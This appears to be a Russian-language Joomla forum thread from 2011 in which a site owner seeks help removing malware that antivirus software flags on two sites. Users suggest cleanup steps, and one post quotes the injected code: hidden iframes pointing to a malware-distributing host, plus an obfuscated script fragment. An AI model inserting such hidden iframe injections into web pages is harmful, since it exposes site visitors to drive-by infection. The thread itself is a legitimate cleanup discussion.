Joomla 1.5 Как найти вирус?

Discussion in 'Сайт умер, лежит и не дышит' started by Roma90, Mar 11, 2011.

  1. Offline

    Roma90 Пользователь

    Joined:
    Jun 21, 2010
    Messages:
    56
    Likes Received:
    0
    Gender:
    Male
    При откритие сайта каспер видает:
    http://i058.radikal.ru/1103/67/06900f4e0461.jpg

    Как мне найти етот вирус!?
    Скачал сайт на ПК. Пробивал поиском - ничего не нашло..
    Такая ситуация на 2 сайтах (на одном хостинге).
    Сайти в подписи.
     
    Last edited: Mar 11, 2011
  2.  
  3. OlegK
    Offline

    OlegK Russian Joomla! Team Staff Member ⇒ Профи ⇐

    Joined:
    Jan 17, 2011
    Messages:
    7,812
    Likes Received:
    771
    Gender:
    Male
    первый способ-смотреть configuration.php. выложи файл на форум. 2.меняй пароль FTP.
     
  4. Offline

    Roma90 Пользователь

    Joined:
    Jun 21, 2010
    Messages:
    56
    Likes Received:
    0
    Gender:
    Male
    В файле configuration все норм =)

    Вирус только на главной вибивает.
    На главной странице наживаю права клав. - источник.

    Есть скрипт вируса! Удалил его, нажимаю применить изменения - не сохраняет.
    Как мне изменить значение главной страници!?
     
  5. OlegK
    Offline

    OlegK Russian Joomla! Team Staff Member ⇒ Профи ⇐

    Joined:
    Jan 17, 2011
    Messages:
    7,812
    Likes Received:
    771
    Gender:
    Male
    Roma90,
    То что ты видишь в браузере-это продукт работы скрипта,вирус не вирус -без разницы.
    пробуй
     

    Attached Files:

    Roma90 likes this.
  6. Offline

    Roma90 Пользователь

    Joined:
    Jun 21, 2010
    Messages:
    56
    Likes Received:
    0
    Gender:
    Male
    Заменил - видало ошибку Internal Server Error...
    Да еще. сообщение об вирусе показивает только в IE, в Опере почему то не сообщает о вирусе!
     
  7. Offline

    Roma90 Пользователь

    Joined:
    Jun 21, 2010
    Messages:
    56
    Likes Received:
    0
    Gender:
    Male
    Проблема не решена - UP
     
  8. Offline

    aero11 Недавно здесь

    Joined:
    Mar 19, 2011
    Messages:
    9
    Likes Received:
    2
    Gender:
    Male
    еще жива трабля ?
     
  9. Offline

    aero11 Недавно здесь

    Joined:
    Mar 19, 2011
    Messages:
    9
    Likes Received:
    2
    Gender:
    Male
    Внимание! Обнаружена проблема!
    www.allforstudent.in.ua содержит материалы сайта bonuses.corkit.co, который, по имеющимся данным, распространяет вредоносное ПО. Ваш компьютер может подвергнуться вирусной атаке при посещении этого сайта.
    Google обнаружил, что на ваш компьютер могут быть установлены вредоносные программы, если вы продолжите просмотр этого сайта. Если вы посещали его в прошлом или доверяете ему, вполне возможно, что он недавно был взломан хакерами. Рекомендуется прекратить просмотр и посетить сайт завтра либо перейти на другой сайт.
    Мы уже сообщили владельцу сайта bonuses.corkit.co о том, что на его сайте найдено вредоносное ПО. Подробнее о проблемах, обнаруженных на bonuses.corkit.co, можно узнать на странице Google Страница диагностики безопасного просмотра.
     
    Roma90 likes this.
  10. Offline

    aero11 Недавно здесь

    Joined:
    Mar 19, 2011
    Messages:
    9
    Likes Received:
    2
    Gender:
    Male
    это вылезло при использовании локального прокси и OS Fedora + Google chrome

    ............ на втором ,тоже самое

    как из вариантов...поглядеть на файл index.php и в шаблоне temlates.php (там у вас может переименовано-кто знает)
    если надо- постараюсь помочь.
    А так...надо искать и думать на основе умозаключений, где могли бы проставлены права на перезапись (666) , потом надо знать и параметры хостинга(бесплатные страдают этим), разрешения в картинках-если не меняли-то ищите откуда прикрепили.
    кстати из моих наблюдений....неизменяемые файлы-ставьте разрешение 444

    -------------
    Ваша проблема - в index.php - там у вас режет Opera с предуставнолеными скриптами.Так к бану от Яндекса подойти легко.


    -------показан конец исходного кода страницы сайта
     

    Attached Files:

    Last edited: Mar 24, 2011
  11. Offline

    Roma90 Пользователь

    Joined:
    Jun 21, 2010
    Messages:
    56
    Likes Received:
    0
    Gender:
    Male
    На главной странице наживаю права клав. - источник.

    Есть скрипт вируса - ......444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,388/t,448/t,448/t.......
    Удалил его, нажимаю применить изменения - не сохраняет.
    Как мне изменить значение главной страници!?

    А где ви нашли етот вирус!?
    </div><iframe src="http://bonuses.corkit.co/ywdngzevkw.php?n=f0203" style="visibility: hidden; position: absolute; left: 0px; top: 0px; " width="10" height="10"></iframe><iframe src="http://bonuses.corkit.co/ywdngzevkw.php?n=f0203" style="visibility: hidden; position: absolute; left: 0px; top: 0px; ".....

    Хостинг платный.
    Копировал сайт на ПК. При помощью поиска ничего не нашел..
     
  12. Asylum
    Offline

    Asylum Местный => Cпециалист <=

    Joined:
    Feb 9, 2007
    Messages:
    2,744
    Likes Received:
    160
    Gender:
    Male
    Удалил из всех файлов, или это файербаге?
     
  13. OlegK
    Offline

    OlegK Russian Joomla! Team Staff Member ⇒ Профи ⇐

    Joined:
    Jan 17, 2011
    Messages:
    7,812
    Likes Received:
    771
    Gender:
    Male
    искал касперским при запуске сайта или как?
     
  14. Offline

    valear Недавно здесь

    Joined:
    Aug 4, 2010
    Messages:
    167
    Likes Received:
    15
    Gender:
    Male
    А всю базу на ПК скопировать и провести поиск через Дримвивер по всем файлам того куска кода пробовал?
     
  15. Offline

    Roma90 Пользователь

    Joined:
    Jun 21, 2010
    Messages:
    56
    Likes Received:
    0
    Gender:
    Male
    Вирус был в файлах index.html.
    Вроде удалил со всех.
    Зайдите на сайт. На главной странице нажмите права клав. - источник. Посмотрите код, пожалуста.
    Как мне оттуда убрать вирус?
    Да, Каспером. Ничего не находит.
    Искал код обычным поиском куска кода в тексте, тоже ничего не нашло.
    Сервисы по анализе говорят что вируса нет.
    Может подскажете где можно проверить сайт на вирусы
    Нет, счас попробую...
     
  16. OlegK
    Offline

    OlegK Russian Joomla! Team Staff Member ⇒ Профи ⇐

    Joined:
    Jan 17, 2011
    Messages:
    7,812
    Likes Received:
    771
    Gender:
    Male
    Так они ж разные бывают,и вирусы меняющие,дописывающие сторонний код в файлы размешенные на хостинге,или скрипты,приходящие со ссылок,размещенных хацкером.

    Roma90,
    Еще и Notepad++ можно искать,он и бесплатный,и нужнее дрима.
     
  17. Offline

    Roma90 Пользователь

    Joined:
    Jun 21, 2010
    Messages:
    56
    Likes Received:
    0
    Gender:
    Male
    Как мне зайти на phpMyAdmin, не подскажете!?
    Как мне узнать пароль и логин для входа?
    Служба поддержки хострера (icq) в выходные не работает :(
     
  18. Offline

    Roma90 Пользователь

    Joined:
    Jun 21, 2010
    Messages:
    56
    Likes Received:
    0
    Gender:
    Male
    draff, Зайдите на сайт. На главной странице нажмите права клав. - источник. Посмотрите код, пожалуста. Как мне удалить его с главной страницы?
     
  19. OlegK
    Offline

    OlegK Russian Joomla! Team Staff Member ⇒ Профи ⇐

    Joined:
    Jan 17, 2011
    Messages:
    7,812
    Likes Received:
    771
    Gender:
    Male
    А по фтп скачать файлы?К панели хостинга есть доступ,какая панель управления хостингом?
    п.с.
    Сейчас попробую зайти,но повторю-в браузере уже результат работы скрипта,даже и вредоносного.
    п.с.
    Аваст заблокировал загрузку сайта.Сейчас попробую с убунты.
     
    Last edited: Mar 26, 2011
  20. Offline

    Roma90 Пользователь

    Joined:
    Jun 21, 2010
    Messages:
    56
    Likes Received:
    0
    Gender:
    Male
    Да по фтп файлы я скачивал, ничего не шашло.
    valear: А всю базу на ПК скопировать...
    Ето что в базе может бить вирус!?
     
  21. OlegK
    Offline

    OlegK Russian Joomla! Team Staff Member ⇒ Профи ⇐

    Joined:
    Jan 17, 2011
    Messages:
    7,812
    Likes Received:
    771
    Gender:
    Male

Share This Page

Loading...